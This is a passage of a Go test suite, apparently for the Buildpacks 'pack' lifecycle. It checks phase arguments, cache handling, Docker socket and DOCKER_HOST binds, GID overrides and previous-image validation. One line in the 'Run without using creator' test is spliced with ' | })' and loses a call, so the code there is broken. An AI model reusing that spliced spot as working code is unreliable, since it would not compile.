h.AssertEq(t, filepath.Base(lifecycle.AppDir()), "workspace")
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 1)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
if entry.Name() == "creator" {
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
when("Run with workspace dir", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: true,
Workspace: "app",
UseCreator: true,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 1)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
if entry.Name() == "creator" {
h.AssertSliceContainsInOrder(t, entry.ContainerConfig().Cmd, "-app", "/app")
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
})
})
when("Run without using creator", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: false,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts) | })
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 5)
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
switch entry.Name() {
case "exporter":
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
case "analyzer":
h.AssertSliceContains(t, entry.ContainerConfig().Cmd, "/some/image")
}
}
})
when("Run with workspace dir", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
Workspace: "app",
UseCreator: false,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
h.AssertEq(t, filepath.Base(lifecycle.AppDir()), "app")
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertNil(t, err)
h.AssertEq(t, len(fakePhaseFactory.NewCalledWithProvider), 5)
appCount := 0
for _, entry := range fakePhaseFactory.NewCalledWithProvider {
switch entry.Name() {
case "detector", "builder", "exporter":
h.AssertSliceContainsInOrder(t, entry.ContainerConfig().Cmd, "-app", "/app")
appCount++
}
}
h.AssertEq(t, appCount, 3)
})
})
})
when("Error cases", func() {
when("passed invalid cache-image", func() {
it("fails", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: false,
CacheImage: "%%%",
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
err = lifecycle.Run(context.Background(), func(execution *build.LifecycleExecution) build.PhaseFactory {
return fakePhaseFactory
})
h.AssertError(t, err, fmt.Sprintf("invalid cache image name: %s", "could not parse reference: %%!(NOVERB)"))
})
})
})
})
when("#Create", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForType = cache.Volume
fakeBuildCache.ReturnForName = "some-cache"
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("creates a phase and then run it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Create(context.Background(), false, "", false, expectedRunImage, expectedRepoName, "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
[]string{"-run-image", expectedRunImage},
[]string{expectedRepoName},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
when("clear cache", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
)
})
})
when("clear cache is false", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-dir", "/cache"},
)
})
})
when("using a cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
[]string{"-cache-image", "some-cache-image"},
)
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
})
})
when("additional tags are specified", func() {
it("configures phases with additional tags", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
additionalTags := []string{"additional-tag-1", "additional-tag-2"}
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakes.NewFakeCache(), fakes.NewFakeCache(), additionalTags, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-tag", additionalTags[0], "-tag", additionalTags[1]},
)
})
})
when("publish", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
volumeMount := "custom-mount-source:/custom-mount-target"
expectedBinds := []string{volumeMount, "some-cache:/cache"}
err := lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{volumeMount}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with registry access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepos := "some-repo-name"
err := lifecycle.Create(context.Background(), true, "", false, "test", expectedRepos, "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
})
when("using a cache image", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), true, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-skip-restore"},
[]string{"-cache-image", "some-cache-image"},
)
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
})
})
when("platform 0.3", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("publish is false", func() {
var (
fakeBuildCache *fakes.FakeCache
fakeLaunchCache *fakes.FakeCache
)
it.Before(func() {
fakeBuildCache = fakes.NewFakeCache()
fakeBuildCache.ReturnForName = "some-cache"
fakeBuildCache.ReturnForType = cache.Volume
fakeLaunchCache = fakes.NewFakeCache()
fakeLaunchCache.ReturnForType = cache.Volume
fakeLaunchCache.ReturnForName = "some-launch-cache"
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-daemon"},
[]string{"-launch-cache", "/launch-cache"},
)
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with tcp docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "tcp://localhost:1234", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with daemon access with alternative unix socket docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, "unix:///home/user/docker.sock", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/home/user/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with alternative windows pipe docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `npipe:\\\\.\pipe\docker_engine_alt`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/home/user/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, `\\.\pipe\docker_engine_alt:\\.\pipe\docker_engine`)
})
when("environment variable DOCKER_HOST is set", func() {
var (
oldDH string
oldDHExists bool
)
it.Before(func() {
oldDH, oldDHExists = os.LookupEnv("DOCKER_HOST")
os.Setenv("DOCKER_HOST", "tcp://example.com:1234")
})
it.After(func() {
if oldDHExists {
os.Setenv("DOCKER_HOST", oldDH)
} else {
os.Unsetenv("DOCKER_HOST")
}
})
it("configures the phase with daemon access with inherited docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `inherit`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://example.com:1234")
})
})
it("configures the phase with daemon access with docker-host with unknown protocol", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Create(context.Background(), false, `withoutprotocol`, false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=withoutprotocol")
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
volumeMount := "custom-mount-source:/custom-mount-target"
expectedBinds := []string{volumeMount, "some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{volumeMount}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("override GID", func() {
when("override GID is provided", func() {
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it("gid is not added to the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Create(context.Background(), false, "", true, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
when("-previous-image is used", func() {
when("image is invalid", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/x/y/?!z", name.WeakValidation)
h.AssertError(t, err, "repository can only contain the runes `abcdefghijklmnopqrstuvwxyz0123456789_-./`")
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.Image = imageName
options.PreviousImage = "previous-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertError(t, err, "invalid image name")
})
})
when("previous-image is invalid", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "%%%"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertError(t, err, "invalid previous image name")
})
})
when("--publish is false", func() {
it("passes previous-image to creator", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "previous-image"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), false, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-previous-image", "previous-image"})
})
})
when("--publish is true", func() {
when("previous-image and image are in the same registry", func() {
it("successfully passes previous-image to creator", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "index.docker.io/some/previous:latest"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "creator")
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-previous-image", "index.docker.io/some/previous:latest"})
})
})
when("previous-image and image are not in the same registry", func() {
it("errors", func() {
var imageName name.Tag
imageName, err := name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.PreviousImage = "example.io/some/previous:latest"
options.Image = imageName
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Create(context.Background(), true, "", false, "test", "test", "test", fakeBuildCache, fakeLaunchCache, []string{}, []string{}, fakePhaseFactory)
h.AssertError(t, err, fmt.Sprintf("%s", err))
})
})
})
})
})
when("#Detect", func() {
it("creates a phase and then runs it", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory := fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
err := lifecycle.Detect(context.Background(), "test", []string{}, fakePhaseFactory)
h.AssertNil(t, err)
h.AssertEq(t, fakePhase.CleanupCallCount, 1)
h.AssertEq(t, fakePhase.RunCallCount, 1)
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Detect(context.Background(), "test", []string{"test"}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "detector")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-log-level", "debug"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Detect(context.Background(), expectedNetworkMode, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
